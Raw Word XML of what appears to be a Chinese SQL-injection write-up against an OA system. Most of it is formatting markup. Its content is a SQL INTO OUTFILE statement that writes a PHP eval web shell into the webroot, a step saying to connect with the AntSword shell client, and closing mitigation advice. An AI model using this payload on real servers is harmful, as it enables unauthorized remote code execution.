        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SELECT 1,2,'&lt;?php eval($_POST["ant"]); ?&gt;' into outfile 'C:\\\TDOA11.5\\webroot\\1.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35A80C" w14:textId="203728DC" w:rsidR="000B1434" w:rsidRDefault="000B1434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274BF8" wp14:editId="2C3FCE9C">
            <wp:extent cx="5274310" cy="146558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579" w14:textId="4E3A677A" w:rsidR="000B1434" w:rsidRDefault="00D2584C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然后蚁剑连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF87B1" w14:textId="34DE87FA" w:rsidR="000B1434" w:rsidRDefault="00C56181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4D73E7E" wp14:editId="31CED3A8">
            <wp:extent cx="5274310" cy="32962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5C8F" w14:textId="2763C40E" w:rsidR="00C83D95" w:rsidRPr="00F40B11" w:rsidRDefault="00C83D95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652727" wp14:editId="7CB3A5DA">
            <wp:extent cx="5274310" cy="32962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4A003A96" w14:textId="7484A1D0" w:rsidR="000427B1" w:rsidRPr="004354CF" w:rsidRDefault="000427B1" w:rsidP="00F338CD">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004354CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006B3A4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006B3A4D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004354CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>普通用户与系统管理员用户的权限要有严格的区分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B83023" w14:textId="2A5AC1E0" w:rsidR="0049271D" w:rsidRPr="004354CF" w:rsidRDefault="000427B1" w:rsidP="00F338CD">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004354CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="006B3A4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006B3A4D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004354CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>强迫使用参数化语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA992F" w14:textId="03161182" w:rsidR="000427B1" w:rsidRPr="004354CF" w:rsidRDefault="000427B1" w:rsidP="00F338CD">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004354CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="006B3A4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006B3A4D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004354CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>加强对用户输入的验证。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000427B1" w:rsidRPr="004354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F8901" w14:textId="77777777" w:rsidR="00C54DE8" w:rsidRDefault="00C54DE8" w:rsidP="002C024D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5CEBD582" w14:textId="77777777" w:rsidR="00C54DE8" w:rsidRDefault="00C54DE8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13FDD" w14:textId="77777777" w:rsidR="00C54DE8" w:rsidRDefault="00C54DE8" w:rsidP="002C024D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="08F50618" w14:textId="77777777" w:rsidR="00C54DE8" w:rsidRDefault="00C54DE8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87D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="826C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C0D37"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="305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164F73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82E4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D135B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BC8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E23021"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1990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62633991"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FE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DA6756"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="512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712EC2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2CA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A75D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C1CF58E"/>
    <w:lvl w:ilvl="0" w:tplc="73201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16"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="10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01B75"/>
    <w:rsid w:val="00011F46"/>
    <w:rsid w:val="00013050"/>
    <w:rsid w:val="00024957"/>
    <w:rsid w:val="00025932"/>
    <w:rsid w:val="00031823"/>
    <w:rsid w:val="000324E5"/>
    <w:rsid w:val="000351E6"/>
    <w:rsid w:val="00041373"/>
    <w:rsid w:val="000427B1"/>
    <w:rsid w:val="00050A46"/>
    <w:rsid w:val="00050CBF"/>
    <w:rsid w:val="0005424F"/>
    <w:rsid w:val="00054438"/>
    <w:rsid w:val="00062ADF"/>
    <w:rsid w:val="000641CF"/>
    <w:rsid w:val="000646D6"/>
    <w:rsid w:val="000675A8"/>
    <w:rsid w:val="0007399C"/>
    <w:rsid w:val="00093A19"/>
    <w:rsid w:val="000A0EF2"/>
    <w:rsid w:val="000A4899"/>
    <w:rsid w:val="000B1434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056C9"/>
    <w:rsid w:val="00116D63"/>
    <w:rsid w:val="00123758"/>
    <w:rsid w:val="00127AFD"/>
    <w:rsid w:val="001304F9"/>
    <w:rsid w:val="00135F35"/>
    <w:rsid w:val="001419EA"/>
    <w:rsid w:val="00145C8D"/>
    <w:rsid w:val="00157B1F"/>
    <w:rsid w:val="00163B5B"/>
    <w:rsid w:val="001754CB"/>
    <w:rsid w:val="00176243"/>
    <w:rsid w:val="00182046"/>
    <w:rsid w:val="00187E1B"/>
    <w:rsid w:val="00190484"/>
    <w:rsid w:val="00192F2F"/>
    <w:rsid w:val="00193F64"/>
    <w:rsid w:val="001A6F6C"/>
    <w:rsid w:val="001D1CB8"/>
    <w:rsid w:val="001D25EF"/>
    <w:rsid w:val="001D6BA4"/>
    <w:rsid w:val="001E078F"/>
    <w:rsid w:val="001F18B8"/>
    <w:rsid w:val="001F4DAA"/>
    <w:rsid w:val="002022F8"/>
    <w:rsid w:val="00203399"/>
    <w:rsid w:val="00211F00"/>
    <w:rsid w:val="0022700D"/>
    <w:rsid w:val="0023642A"/>
    <w:rsid w:val="00245C2B"/>
    <w:rsid w:val="00247CA0"/>
    <w:rsid w:val="00251F47"/>
    <w:rsid w:val="002600BD"/>
    <w:rsid w:val="00271F2E"/>
    <w:rsid w:val="00275D96"/>
    <w:rsid w:val="00287C87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43D68"/>
    <w:rsid w:val="003542EF"/>
    <w:rsid w:val="0035510D"/>
    <w:rsid w:val="00355B8A"/>
    <w:rsid w:val="003611E7"/>
    <w:rsid w:val="00372484"/>
    <w:rsid w:val="00376C4C"/>
    <w:rsid w:val="00377322"/>
    <w:rsid w:val="00381D3B"/>
    <w:rsid w:val="0038221A"/>
    <w:rsid w:val="0038523B"/>
    <w:rsid w:val="00396924"/>
    <w:rsid w:val="003B3DEF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26F7C"/>
    <w:rsid w:val="00433655"/>
    <w:rsid w:val="004354CF"/>
    <w:rsid w:val="00436A69"/>
    <w:rsid w:val="004621C9"/>
    <w:rsid w:val="00464956"/>
    <w:rsid w:val="0046657C"/>
    <w:rsid w:val="00466587"/>
    <w:rsid w:val="00470D35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03D3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4D2F"/>
    <w:rsid w:val="005476C6"/>
    <w:rsid w:val="005517BC"/>
    <w:rsid w:val="00562316"/>
    <w:rsid w:val="005651A7"/>
    <w:rsid w:val="00572DB5"/>
    <w:rsid w:val="00580496"/>
    <w:rsid w:val="00581284"/>
    <w:rsid w:val="005827E8"/>
    <w:rsid w:val="00583C93"/>
    <w:rsid w:val="0058419E"/>
    <w:rsid w:val="005844FC"/>
    <w:rsid w:val="00586D42"/>
    <w:rsid w:val="005A68F3"/>
    <w:rsid w:val="005B677A"/>
    <w:rsid w:val="005C0D13"/>
    <w:rsid w:val="005D79E7"/>
    <w:rsid w:val="005E0340"/>
    <w:rsid w:val="005F015F"/>
    <w:rsid w:val="005F35E4"/>
    <w:rsid w:val="00600764"/>
    <w:rsid w:val="00601FF8"/>
    <w:rsid w:val="0061241B"/>
    <w:rsid w:val="00621D5E"/>
    <w:rsid w:val="00625665"/>
    <w:rsid w:val="00635D23"/>
    <w:rsid w:val="0063704D"/>
    <w:rsid w:val="00641DA8"/>
    <w:rsid w:val="0065294B"/>
    <w:rsid w:val="00652D7E"/>
    <w:rsid w:val="00666F62"/>
    <w:rsid w:val="00671CD6"/>
    <w:rsid w:val="00676D78"/>
    <w:rsid w:val="00681AEA"/>
    <w:rsid w:val="00687841"/>
    <w:rsid w:val="006A63FC"/>
    <w:rsid w:val="006B3A4D"/>
    <w:rsid w:val="006B645E"/>
    <w:rsid w:val="006C15B3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3DA6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0E81"/>
    <w:rsid w:val="007A2204"/>
    <w:rsid w:val="007A42D3"/>
    <w:rsid w:val="007A461D"/>
    <w:rsid w:val="007B0CBD"/>
    <w:rsid w:val="007B2E03"/>
    <w:rsid w:val="007C4D64"/>
    <w:rsid w:val="007D0B4C"/>
    <w:rsid w:val="007E1A97"/>
    <w:rsid w:val="007E4916"/>
    <w:rsid w:val="007F1236"/>
    <w:rsid w:val="007F174D"/>
    <w:rsid w:val="007F3F22"/>
    <w:rsid w:val="007F6EAB"/>
    <w:rsid w:val="007F7D84"/>
    <w:rsid w:val="00802DC1"/>
    <w:rsid w:val="0080309D"/>
    <w:rsid w:val="00811A93"/>
    <w:rsid w:val="00813CF8"/>
    <w:rsid w:val="008178C6"/>
    <w:rsid w:val="00822600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C29EA"/>
    <w:rsid w:val="008C79F2"/>
    <w:rsid w:val="008C7D3F"/>
    <w:rsid w:val="008D25CE"/>
    <w:rsid w:val="008D2B4C"/>
    <w:rsid w:val="008E0FAC"/>
    <w:rsid w:val="008E2FF5"/>
    <w:rsid w:val="008E7A5D"/>
    <w:rsid w:val="009006D0"/>
    <w:rsid w:val="0090365B"/>
    <w:rsid w:val="00903FAE"/>
    <w:rsid w:val="00912658"/>
    <w:rsid w:val="00923C21"/>
    <w:rsid w:val="00926EBB"/>
    <w:rsid w:val="00927BA4"/>
    <w:rsid w:val="00932786"/>
    <w:rsid w:val="009433C9"/>
    <w:rsid w:val="00944B99"/>
    <w:rsid w:val="009473C5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1919"/>
    <w:rsid w:val="009959CE"/>
    <w:rsid w:val="00995D2A"/>
    <w:rsid w:val="009A0E97"/>
    <w:rsid w:val="009A6839"/>
    <w:rsid w:val="009B3E23"/>
    <w:rsid w:val="009B515A"/>
    <w:rsid w:val="009C3203"/>
    <w:rsid w:val="009C504C"/>
    <w:rsid w:val="009C5D93"/>
    <w:rsid w:val="009D2C17"/>
    <w:rsid w:val="009E2BE8"/>
    <w:rsid w:val="009E58F6"/>
    <w:rsid w:val="009E7537"/>
    <w:rsid w:val="00A01A1F"/>
    <w:rsid w:val="00A03F53"/>
    <w:rsid w:val="00A10BE7"/>
    <w:rsid w:val="00A14674"/>
    <w:rsid w:val="00A146A6"/>
    <w:rsid w:val="00A15059"/>
    <w:rsid w:val="00A30126"/>
    <w:rsid w:val="00A30EB7"/>
    <w:rsid w:val="00A336CE"/>
    <w:rsid w:val="00A34D91"/>
    <w:rsid w:val="00A353B0"/>
    <w:rsid w:val="00A36778"/>
    <w:rsid w:val="00A47E23"/>
    <w:rsid w:val="00A5090E"/>
    <w:rsid w:val="00A550B6"/>
    <w:rsid w:val="00A57BEF"/>
    <w:rsid w:val="00A609B0"/>
    <w:rsid w:val="00A64342"/>
    <w:rsid w:val="00A643EE"/>
    <w:rsid w:val="00A75A93"/>
    <w:rsid w:val="00A766E9"/>
    <w:rsid w:val="00A8737A"/>
    <w:rsid w:val="00A9551A"/>
    <w:rsid w:val="00A9643E"/>
    <w:rsid w:val="00AA40BB"/>
    <w:rsid w:val="00AB03BA"/>
    <w:rsid w:val="00AB4CD4"/>
    <w:rsid w:val="00AC06D8"/>
    <w:rsid w:val="00AC0FAF"/>
    <w:rsid w:val="00AC107D"/>
    <w:rsid w:val="00AC2FE3"/>
    <w:rsid w:val="00AC6846"/>
    <w:rsid w:val="00AC7563"/>
    <w:rsid w:val="00AD6B5D"/>
    <w:rsid w:val="00AE2576"/>
    <w:rsid w:val="00AE2C8B"/>
    <w:rsid w:val="00AE4F74"/>
    <w:rsid w:val="00AE5448"/>
    <w:rsid w:val="00AF2932"/>
    <w:rsid w:val="00AF5EA4"/>
    <w:rsid w:val="00AF706D"/>
    <w:rsid w:val="00B07A86"/>
    <w:rsid w:val="00B10136"/>
    <w:rsid w:val="00B10AE8"/>
    <w:rsid w:val="00B11964"/>
    <w:rsid w:val="00B12271"/>
    <w:rsid w:val="00B14D87"/>
    <w:rsid w:val="00B1551E"/>
    <w:rsid w:val="00B21713"/>
    <w:rsid w:val="00B21ED4"/>
    <w:rsid w:val="00B22DF4"/>
    <w:rsid w:val="00B40624"/>
    <w:rsid w:val="00B44C31"/>
    <w:rsid w:val="00B46BAA"/>
    <w:rsid w:val="00B52443"/>
    <w:rsid w:val="00B64505"/>
    <w:rsid w:val="00B65487"/>
    <w:rsid w:val="00B65A24"/>
    <w:rsid w:val="00B75881"/>
    <w:rsid w:val="00B959E6"/>
    <w:rsid w:val="00BA11EF"/>
    <w:rsid w:val="00BA4098"/>
    <w:rsid w:val="00BA40AC"/>
    <w:rsid w:val="00BB6F3C"/>
    <w:rsid w:val="00BC64B5"/>
    <w:rsid w:val="00BD18ED"/>
    <w:rsid w:val="00BD25DD"/>
    <w:rsid w:val="00BE050B"/>
    <w:rsid w:val="00BE26D7"/>
    <w:rsid w:val="00BF1178"/>
    <w:rsid w:val="00BF18FF"/>
    <w:rsid w:val="00C02390"/>
    <w:rsid w:val="00C12A09"/>
    <w:rsid w:val="00C1351E"/>
    <w:rsid w:val="00C15A25"/>
    <w:rsid w:val="00C21F5B"/>
    <w:rsid w:val="00C23AFE"/>
    <w:rsid w:val="00C33D2F"/>
    <w:rsid w:val="00C36868"/>
    <w:rsid w:val="00C412A3"/>
    <w:rsid w:val="00C54DE8"/>
    <w:rsid w:val="00C56181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3D95"/>
    <w:rsid w:val="00C8421D"/>
    <w:rsid w:val="00C849EA"/>
    <w:rsid w:val="00CB3336"/>
    <w:rsid w:val="00CB4D9C"/>
    <w:rsid w:val="00CB62BE"/>
    <w:rsid w:val="00CB7103"/>
    <w:rsid w:val="00CC08DB"/>
    <w:rsid w:val="00CC1A4B"/>
    <w:rsid w:val="00CE1B55"/>
    <w:rsid w:val="00CE2C86"/>
    <w:rsid w:val="00CE30A6"/>
    <w:rsid w:val="00CF14F4"/>
    <w:rsid w:val="00CF77BF"/>
    <w:rsid w:val="00D02060"/>
    <w:rsid w:val="00D02932"/>
    <w:rsid w:val="00D03262"/>
    <w:rsid w:val="00D05E8F"/>
    <w:rsid w:val="00D121FB"/>
    <w:rsid w:val="00D2584C"/>
    <w:rsid w:val="00D27208"/>
    <w:rsid w:val="00D3306C"/>
    <w:rsid w:val="00D47299"/>
    <w:rsid w:val="00D53B8F"/>
    <w:rsid w:val="00D61450"/>
    <w:rsid w:val="00D64A61"/>
    <w:rsid w:val="00D7251C"/>
    <w:rsid w:val="00D755D7"/>
    <w:rsid w:val="00D917A2"/>
    <w:rsid w:val="00DA05D5"/>
    <w:rsid w:val="00DA227B"/>
    <w:rsid w:val="00DA2C8C"/>
    <w:rsid w:val="00DA6442"/>
    <w:rsid w:val="00DB0791"/>
    <w:rsid w:val="00DC7012"/>
    <w:rsid w:val="00DE5B5B"/>
    <w:rsid w:val="00DE7684"/>
    <w:rsid w:val="00DF44D7"/>
    <w:rsid w:val="00E03C77"/>
    <w:rsid w:val="00E058AC"/>
    <w:rsid w:val="00E0620F"/>
    <w:rsid w:val="00E132DC"/>
    <w:rsid w:val="00E20A3E"/>
    <w:rsid w:val="00E217B7"/>
    <w:rsid w:val="00E338DD"/>
    <w:rsid w:val="00E37157"/>
    <w:rsid w:val="00E43B7A"/>
    <w:rsid w:val="00E44AEC"/>
    <w:rsid w:val="00E453C6"/>
    <w:rsid w:val="00E46233"/>
    <w:rsid w:val="00E63E6A"/>
    <w:rsid w:val="00E755E3"/>
    <w:rsid w:val="00E765BE"/>
    <w:rsid w:val="00E76CB2"/>
    <w:rsid w:val="00E77841"/>
    <w:rsid w:val="00E848F0"/>
    <w:rsid w:val="00E87B64"/>
    <w:rsid w:val="00EA0094"/>
    <w:rsid w:val="00EA556B"/>
    <w:rsid w:val="00EA5E37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40B11"/>
    <w:rsid w:val="00F476ED"/>
    <w:rsid w:val="00F50319"/>
    <w:rsid w:val="00F6029A"/>
    <w:rsid w:val="00F62EDC"/>
    <w:rsid w:val="00F6391B"/>
    <w:rsid w:val="00F67948"/>
    <w:rsid w:val="00F679E1"/>
    <w:rsid w:val="00F71099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227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  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetouter">
    <w:name w:val="code-snippet_outer"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A75A93"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetkeyword">
    <w:name w:val="code-snippet__keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A75A93"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetstring">
    <w:name w:val="code-snippet__string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A75A93"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetattribute">
    <w:name w:val="code-snippet__attribute"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A75A93"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetnumber">
    <w:name w:val="code-snippet__number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A75A93"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetcomment">
    <w:name w:val="code-snippet__comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A75A93"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetsymbol">
    <w:name w:val="code-snippet__symbol"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A75A93"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetregexp">
    <w:name w:val="code-snippet__regexp"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A75A93"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetattr">
    <w:name w:val="code-snippet__attr"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00470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2</Pages>
  <Words>1114</Words>
  <Characters>6355</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>52</Lines>
  <Paragraphs>14</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Microsoft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116</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-30T03:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08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